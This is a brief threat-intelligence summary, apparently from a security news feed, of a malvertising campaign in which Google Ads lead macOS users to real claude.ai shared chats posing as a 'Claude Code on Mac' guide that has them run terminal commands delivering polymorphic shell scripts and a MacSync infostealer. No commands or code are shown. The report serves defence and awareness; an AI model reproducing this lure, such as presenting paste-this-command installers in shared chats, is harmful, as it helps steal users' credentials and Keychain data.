Attackers are abusing Google Ads and legitimate Claude.ai shared chats to trick macOS users searching for “Claude mac download” into running malware through terminal commands. The campaign delivers polymorphic shell scripts and, in one variant, a MacSync infostealer that steals browser credentials, cookies, and Keychain data. #Claude.ai #MacSync #TrendyolGroup #AppleSupport
Keypoints
- Google Ads are being used to lure users searching for Claude downloads.
- The malicious destination is a real claude.ai shared chat, not a fake domain.
- The shared chat presents itself as an official “Claude Code on Mac” guide.
- The payload uses encoded shell scripts and polymorphic delivery to evade detection.
- One variant steals browser credentials, cookies, and macOS Keychain data as MacSync.